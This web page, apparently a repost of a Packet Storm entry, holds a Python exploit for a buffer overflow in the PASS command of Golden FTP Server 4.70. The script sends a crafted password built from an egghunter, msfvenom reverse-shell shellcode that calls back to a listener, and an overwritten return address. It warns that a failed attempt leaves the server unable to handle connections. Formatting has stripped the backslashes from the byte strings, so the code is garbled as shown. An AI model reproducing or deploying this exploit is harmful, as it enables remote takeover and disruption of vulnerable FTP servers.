Golden FTP Server 4.70 Buffer Overflow ≈ Packet Storm – Digitalmunition




Exploit/Advisories no-image-featured-image.png

Published on March 11th, 2021 📆 | 7376 Views ⚑

0

Golden FTP Server 4.70 Buffer Overflow ≈ Packet Storm

# Golden FTP Server 4.70 – ‘PASS’ Buffer Overflow (2)
# Author: 1F98D
# Original Authors: Craig Freyman (cd1zz) and Gerardo Iglesias Galvan (iglesiasgg)
# Tested on Windows 10 (x64)
#
# A buffer overflow exists in GoldenFTP during the authentication process.
# Note that the source ip address of the user performing the authentication
# forms part of the buffer and as such must be accounted for when calculating
# the appropriate offset. It should also be noted that the exploit is
# rather unstable and if exploitation fails, GoldenFTP will be left in
# a state where it will still accept connections, but it will be unable
# to handle or process them in anyway, so be careful.
#
#!/usr/local/bin/python3

from socket import *
import sys

# Your address forms part of the buffer length calculation
SOURCE = ‘192.168.1.1’
TARGET = ‘192.168.1.2’
s = socket(AF_INET, SOCK_STREAM)
s.connect((TARGET, 21))

# msfvenom -p windows/shell_reverse_tcp -f python -b ‘x00x0ax0d’ LHOST=192.168.1.1 LPORT=4444
buf = b””
buf += b”xbax1exb6xaax95xdaxc3xd9x74x24xf4x5dx29″
buf += b”xc9xb1x52x83xc5x04x31x55x0ex03x4bxb8x48″
buf += b”x60x8fx2cx0ex8bx6fxadx6fx05x8ax9cxafx71″
buf += b”xdfx8fx1fxf1x8dx23xebx57x25xb7x99x7fx4a”
buf += b”x70x17xa6x65x81x04x9axe4x01x57xcfxc6x38″
buf += b”x98x02x07x7cxc5xefx55xd5x81x42x49x52xdf”
buf += b”x5exe2x28xf1xe6x17xf8xf0xc7x86x72xabxc7″
buf += b”x29x56xc7x41x31xbbxe2x18xcax0fx98x9ax1a”
buf += b”x5ex61x30x63x6ex90x48xa4x49x4bx3fxdcxa9″
buf += b”xf6x38x1bxd3x2cxccxbfx73xa6x76x1bx85x6b”
buf += b”xe0xe8x89xc0x66xb6x8dxd7xabxcdxaax5cx4a”
buf += b”x01x3bx26x69x85x67xfcx10x9cxcdx53x2cxfe”
buf += b”xadx0cx88x75x43x58xa1xd4x0cxadx88xe6xcc”
buf += b”xb9x9bx95xfex66x30x31xb3xefx9exc6xb4xc5″
buf += b”x67x58x4bxe6x97x71x88xb2xc7xe9x39xbbx83″
buf += b”xe9xc6x6ex03xb9x68xc1xe4x69xc9xb1x8cx63″
buf += b”xc6xeexadx8cx0cx87x44x77xc7x68x30x76x16″
buf += b”x01x43x78x09x8dxcax9ex43x3dx9bx09xfcxa4″
buf += b”x86xc1x9dx29x1dxacx9exa2x92x51x50x43xde”
buf += b”x41x05xa3x95x3bx80xbcx03x53x4ex2exc8xa3″
buf += b”x19x53x47xf4x4exa5x9ex90x62x9cx08x86x7e”
buf += b”x78x72x02xa5xb9x7dx8bx28x85x59x9bxf4x06″
buf += b”xe6xcfxa8x50xb0xb9x0ex0bx72x13xd9xe0xdc”
buf += b”xf3x9cxcaxdex85xa0x06xa9x69x10xffxecx96″
buf += b”x9dx97xf8xefxc3x07x06x3ax40x37x4dx66xe1″
buf += b”xd0x08xf3xb3xbcxaax2exf7xb8x28xdax88x3e”
buf += b”x30xafx8dx7bxf6x5cxfcx14x93x62x53x14xb6″

total_length = 545-len(SOURCE)
eip = b’x7fx79x4cx00′
hunter = b’x90x90x90x90x90x90′ # padding ; nop slide to account for variable offset base on source ip
hunter += b’xfd’ # std ; set df flag so we search high to low
hunter += b’xb8x43x42x41x40′ # mov eax, 0x40414243 ; egg
hunter += b’x89xF7′ # mov edi, esi ; start searching from esi
hunter += b’x47′ # inc edi
hunter += b’x90′ # nop
hunter += b’x83xC7x03′ # add edi, 0x3 ; scasd decrements by 4, add 3 so we search 1 by 1
hunter += b’xaf’ # scasd ; check for egg at edi
hunter += b’x75xfa’ # short jnz -0x6 ; jump back to add edi, 0x3
hunter += b’x83xC7x03′ # add edi, 0x3
hunter += b’xaf’ # scasd
hunter += b’x75xfa’ # short jnz -0x6
hunter += b’x83xC7x1f’ # add edi, 0x1f ; account for egg hunter
hunter += b’xffxe7′ # jmp edi ; egg found, let’s go!
hunter += b’x90x90x90x90x90x90′ # padding ; nop slide to account for variable offset again

payload = hunter + buf + b’x90’*(total_length-len(eip)-len(hunter)-len(buf)) + eip

s.send(b’USER anonymousrn’)
print(s.recv(1024))
print(s.recv(1024))
s.send(b’PASS ‘ + payload + b’rn’)
print(s.recv(1024))
s.send(b’QUITrn’)
print(s.recv(1024))

Source link

Tagged with:



Leave a Reply